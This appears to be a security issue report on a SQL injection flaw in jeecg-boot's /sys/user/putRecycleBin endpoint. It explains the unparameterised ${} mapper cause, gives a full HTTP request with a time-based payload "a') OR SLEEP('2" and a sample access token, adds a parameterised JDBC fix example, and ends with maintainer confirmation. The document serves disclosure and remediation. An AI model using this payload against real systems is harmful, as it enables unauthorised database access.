/sys/user/putRecycleBin is affected by SQL injection
sysUserMapper.xml
revertLogicDeleted. You can see that no precompiling is performed

SysUserController.java
SysUserServiceImpl.java
So users can pass in malicious parameters through HTTP requests to achieve SQL injection.
poc
The website will return immediately when the following content is passed in
After the following content is passed in, the website will return after a delay of 2 seconds

vuln
An attacker can use this to get data from the database.
payload:
PUT /jeecg-boot/sys/user/putRecycleBin HTTP/1.1
Host: 192.168.1.1:8088
Content-Length: 34
Request-Origion: Knife4j
Accept: /
knife4j-gateway-code: ROOT
X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NjY2NjgzNjYsInVzZXJuYW1lIjoiYWRtaW4ifQ.WUx3LR8rvOp92_GueiJtlqtjV4tDRnOZos_-IAp34nA
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Content-Type: application/json
Origin: http://192.168.1.1:8088
Referer: http://192.168.1.1:8088/jeecg-boot/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close

{ "userIds": "a') OR SLEEP('2" }
patch
In (${}): it seems that this cannot be modified to precompile, so it is recommended to add some keywords such as ')
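
An IN list can be bound as parameters by emitting one `?` per element, which is the same shape a MyBatis `<foreach>` over `#{id}` generates. The following is an added example in plain JDBC, not code from the report or from the jeecg-boot project; the class name, the `sys_user` table, the `del_flag` and `id` columns and the numeric sample IDs are assumptions.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;

public class RevertLogicDeletedExample {

    // Hypothetical table and column names; the page does not show the real statement.
    private static final String PREFIX =
        "UPDATE sys_user SET del_flag = 0 WHERE del_flag = 1 AND id IN (";

    /** Split the comma-separated request value into individual, non-empty IDs. */
    static List<String> splitIds(String userIds) {
        List<String> ids = new ArrayList<>();
        if (userIds == null) return ids;
        for (String part : userIds.split(",")) {
            String id = part.trim();
            if (!id.isEmpty()) ids.add(id);
        }
        return ids;
    }

    /** Build "... IN (?, ?, ?)" with exactly one placeholder per ID. */
    static String buildSql(int idCount) {
        if (idCount < 1) throw new IllegalArgumentException("no user IDs supplied");
        return PREFIX + String.join(", ", Collections.nCopies(idCount, "?")) + ")";
    }

    /** Run the update; every ID travels as a bound parameter, never as SQL text. */
    static int revertLogicDeleted(Connection conn, String userIds) throws SQLException {
        List<String> ids = splitIds(userIds);
        try (PreparedStatement ps = conn.prepareStatement(buildSql(ids.size()))) {
            for (int i = 0; i < ids.size(); i++) {
                ps.setString(i + 1, ids.get(i));
            }
            return ps.executeUpdate();
        }
    }

    public static void main(String[] args) {
        // Constructed sample IDs, followed by the request value quoted in the report.
        for (String input : new String[] {"1001,1002,1003", "a') OR SLEEP('2"}) {
            List<String> ids = splitIds(input);
            System.out.println(buildSql(ids.size()) + "  params=" + ids);
        }
    }
}
```

Running `main` needs no database: it prints the statement text and the bind list, so the value from the report shows up as a single bound string rather than as part of the SQL.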
Confirmed, this can be changed.
Fixed.